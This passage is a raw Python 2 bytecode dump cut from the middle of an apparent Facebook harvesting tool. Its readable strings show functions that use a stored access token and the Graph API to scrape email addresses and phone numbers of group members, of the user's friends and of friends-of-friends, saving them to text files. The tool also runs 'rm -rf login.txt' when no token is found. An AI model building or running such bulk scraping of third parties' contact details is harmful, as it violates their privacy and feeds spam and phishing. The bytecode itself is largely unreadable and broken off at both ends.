\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d!\x00\x83\x01\x00}\n\x00t\x03\x00j\x1d\x00d\x12\x00d"\x00|\n\x00\x17\x83\x02\x00\x01d#\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r\xa9\x02\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xd5\x02\x01\x01\x01d%\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xfb\x02\x01\x01\x01d&\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\x1d\x03\x01\x01\x01d\'\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S((\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member email \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x16\x00\x00\x00out/em_member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sW\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email from member group \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00emmemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x98\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00Rm\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8a\x00\x00\x00H\x02\x00\x00s~\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\x00\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x13\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00d\x11\x00\x14GHt\x00\x00d\x12\x00d\x13\x00\x83\x02\x00}\x04\x00t\x0c\x00j\r\x00d\x14\x00|\x01\x00\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0e\x00j\x0f\x00|\x05\x00j\x10\x00\x83\x01\x00}\x06\x00x\xcb\x00|\x06\x00d\x16\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\x14\x00|\x07\x00d\x17\x00\x19\x17d\x18\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x19\x00\x19\x83\x01\x00\x01|\x04\x00j\x16\x00|\t\x00d\x19\x00\x19d\x1a\x00\x17\x83\x01\x00\x01d\x1b\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1c\x00\x17|\t\x00d\x19\x00\x19\x17d\x1d\x00\x17|\t\x00d\x0c\x00\x19\x17d\x1a\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1e\x00\x83\x01\x00\x01Wq[\x01\x04t\x11\x00k\n\x00r\x19\x02\x01\x01\x01q[\x01Xq[\x01W|\x04\x00j\x1c\x00\x83\x00\x00\x01d\x10\x00d\x11\x00\x14GHd\x1f\x00GHd \x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d!\x00\x83\x01\x00}\n\x00t\x03\x00j\x1d\x00d\x12\x00d"\x00|\n\x00\x17\x83\x02\x00\x01d#\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r\xa9\x02\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xd5\x02\x01\x01\x01d%\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\xfb\x02\x01\x01\x01d&\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r\x1d\x03\x01\x01\x01d\'\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S((\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s<\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member phone number \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x16\x00\x00\x00out/no_member_grup.txtR\x11\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=Rl\x00\x00\x00Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=Rw\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?s^\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get phone number from member group \x1b[1;97m....s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Number \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00nomemR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R\x98\x00\x00\x00R\xa1\x00\x00\x00R\xa2\x00\x00\x00Rm\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8b\x00\x00\x00\x88\x02\x00\x00s~\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\n\x01\t\x01\x0f\x01\x1b\x01\x12\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xa6\x02\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x02\x00k\n\x00rR\x00\x01\x01\x01d\x03\x00GHt\x03\x00j\x04\x00d\x04\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x05\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x03\x00j\x08\x00d\x06\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00rw\x00\x01\x01\x01n\x01\x00Xy\x8c\x01t\x03\x00j\x04\x00d\x07\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00j\x0c\x00d\x08\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\r\x00j\x0e\x00|\x01\x00j\x0f\x00\x83\x01\x00}\x02\x00t\x10\x00d\t\x00\x83\x01\x00\x01d\n\x00d\x0b\x00\x14GHt\x00\x00d\x0c\x00d\r\x00\x83\x02\x00}\x03\x00x\xcb\x00|\x02\x00d\x0e\x00\x19D]\xbf\x00}\x04\x00t\x0b\x00j\x0c\x00d\x0f\x00|\x04\x00d\x10\x00\x19\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x0e\x00|\x05\x00j\x0f\x00\x83\x01\x00}\x06\x00yt\x00t\x11\x00j\x12\x00|\x06\x00d\x12\x00\x19\x83\x01\x00\x01|\x03\x00j\x13\x00|\x06\x00d\x12\x00\x19d\x13\x00\x17\x83\x01\x00\x01d\x14\x00t\x14\x00t\x15\x00t\x11\x00\x83\x01\x00\x83\x01\x00\x17d\x15\x00\x17|\x06\x00d\x12\x00\x19\x17d\x16\x00\x17|\x06\x00d\x17\x00\x19\x17d\x13\x00\x17Gt\x16\x00j\x17\x00j\x18\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x18\x00\x83\x01\x00\x01Wq\xdf\x00\x04t\x19\x00k\n\x00r\x9d\x01\x01\x01\x01q\xdf\x00Xq\xdf\x00W|\x03\x00j\x1a\x00\x83\x00\x00\x01d\n\x00d\x0b\x00\x14GHd\x19\x00GHd\x1a\x00t\x15\x00t\x11\x00\x83\x01\x00\x16GHt\x1b\x00d\x1b\x00\x83\x01\x00}\x07\x00t\x03\x00j\x1c\x00d\x0c\x00d\x1c\x00|\x07\x00\x17\x83\x02\x00\x01d\x1d\x00|\x07\x00\x17GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x02\x00k\n\x00r-\x02\x01\x01\x01d\x1f\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00rY\x02\x01\x01\x01d \x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01nI\x00\x04t\x19\x00k\n\x00r\x7f\x02\x01\x01\x01d!\x00GHt\x1b\x00d\x1e\x00\x83\x01\x00\x01t\x1d\x00\x83\x00\x00\x01n#\x00\x04t\x0b\x00j \x00j!\x00k\n\x00r\xa1\x02\x01\x01\x01d"\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(#\x00\x00\x00Ns\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00R&\x00\x00\x00s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=s3\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x13\x00\x00\x00out/email_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/Rj\x00\x00\x00s\x0e\x00\x00\x00?access_token=R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | R0\x00\x00\x00g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x02\x00\x00\x00emR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R,\x00\x00\x00Rg\x00\x00\x00R/\x00\x00\x00R\x95\x00\x00\x00R\x80\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x08\x00\x00\x00R4\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R?\x00\x00\x00\xc8\x02\x00\x00sl\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x13\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s/\x03\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy\x11\x00t\x00\x00j\x08\x00d\x07\x00\x83\x01\x00\x01Wn\x11\x00\x04t\t\x00k\n\x00r\x84\x00\x01\x01\x01n\x01\x00Xy\x08\x02t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\n\x00GHt\x0b\x00d\x08\x00\x83\x01\x00}\x01\x00y>\x00t\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x02\x00t\x0e\x00j\x0f\x00|\x02\x00j\x10\x00\x83\x01\x00}\x03\x00d\x0b\x00|\x03\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x11\x00k\n\x00r\r\x01\x01\x01\x01d\r\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n\x01\x00Xt\x0c\x00j\r\x00d\t\x00|\x01\x00\x17d\x0f\x00\x17|\x00\x00\x17\x83\x01\x00}\x04\x00t\x0e\x00j\x0f\x00|\x04\x00j\x10\x00\x83\x01\x00}\x05\x00t\x13\x00d\x10\x00\x83\x01\x00\x01d\x11\x00d\x12\x00\x14GHt\x02\x00d\x13\x00d\x14\x00\x83\x02\x00}\x06\x00x\xcb\x00|\x05\x00d\x15\x00\x19D]\xbf\x00}\x07\x00t\x0c\x00j\r\x00d\t\x00|\x07\x00d\x16\x00\x19\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x0e\x00j\x0f\x00|\x08\x00j\x10\x00\x83\x01\x00}\t\x00yt\x00t\x14\x00j\x15\x00|\t\x00d\x17\x00\x19\x83\x01\x00\x01|\x06\x00j\x16\x00|\t\x00d\x17\x00\x19d\x18\x00\x17\x83\x01\x00\x01d\x19\x00t\x17\x00t\x18\x00t\x14\x00\x83\x01\x00\x83\x01\x00\x17d\x1a\x00\x17|\t\x00d\x17\x00\x19\x17d\x1b\x00\x17|\t\x00d\x0c\x00\x19\x17d\x18\x00\x17Gt\x19\x00j\x1a\x00j\x1b\x00\x83\x00\x00\x01t\x05\x00j\x06\x00d\x1c\x00\x83\x01\x00\x01Wqh\x01\x04t\x11\x00k\n\x00r&\x02\x01\x01\x01qh\x01Xqh\x01W|\x06\x00j\x1c\x00\x83\x00\x00\x01d\x11\x00d\x12\x00\x14GHd\x1d\x00GHd\x1e\x00t\x18\x00t\x14\x00\x83\x01\x00\x16GHt\x0b\x00d\x1f\x00\x83\x01\x00}\n\x00t\x00\x00j\x1d\x00d\x13\x00d \x00|\n\x00\x17\x83\x02\x00\x01d!\x00|\n\x00\x17GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01Wn\x9b\x00\x04t\x04\x00k\n\x00r\xb6\x02\x01\x01\x01d"\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nu\x00\x04t\x1e\x00t\x1f\x00f\x02\x00k\n\x00r\xe2\x02\x01\x01\x01d#\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01nI\x00\x04t\x11\x00k\n\x00r\x08\x03\x01\x01\x01d$\x00GHt\x0b\x00d\x0e\x00\x83\x01\x00\x01t\x12\x00\x83\x00\x00\x01n#\x00\x04t\x0c\x00j \x00j!\x00k\n\x00r*\x03\x01\x01\x01d%\x00GHt"\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(&\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00R\x90\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x16\x00\x00\x00/friends?access_token=s?\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend email from friend \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00out/em_teman_from_teman.txtR\x11\x00\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00R?\x00\x00\x00s\x01\x00\x00\x00\ns\x11\x00\x00\x00\r\x1b[1;97m[ \x1b[1;92ms\x1a\x00\x00\x00\x1b[1;97m ]\x1b[1;97m=> \x1b[1;97ms\x03\x00\x00\x00 | g-C\x1c\xeb\xe26\x1a?sE\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mSuccessfully get email \x1b[1;97m....s1\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mTotal Email \x1b[1;91m: \x1b[1;97m%ss7\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSave file with name\x1b[1;91m :\x1b[1;97m s\x04\x00\x00\x00out/s2\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m: \x1b[1;97mout/s\x1e\x00\x00\x00\x1b[1;91m[!] Error creating files\x12\x00\x00\x00\x1b[1;91m[!] Stoppeds\x10\x00\x00\x00\x1b[1;91m[!] Errors\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(#\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x80\x00\x00\x00R \x00\x00\x00t\x0b\x00\x00\x00emfromtemanR\x94\x00\x00\x00R\x19\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00Rg\x00\x00\x00R\x95\x00\x00\x00R\x96\x00\x00\x00R\x97\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00R\x9c\x00\x00\x00R\x9d\x00\x00\x00R\x9e\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00R\x98\x00\x00\x00R\x13\x00\x00\x00R\x10\x00\x00\x00R\x1e\x00\x00\x00R\x99\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x8c\x00\x00\x00\xff\x02\x00\x00s\x80\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\r\x01\x05\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x1b\x01\x12\x01\n\x01\t\x01\x0f\x01\x11\x01\x1f\x01\x12\x01\x03\x01\x11\x01\x15\x010\x00\r\x00\x11\x01\r\x01\x08\x01\n\x01\t\x01\x05\x01\x0f\x01\x0c\x01\x14\x01\t\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01\n\x01\n\x01\r\x01\x05\x01\n\x01\n\x01\x13\x01\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb9\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x0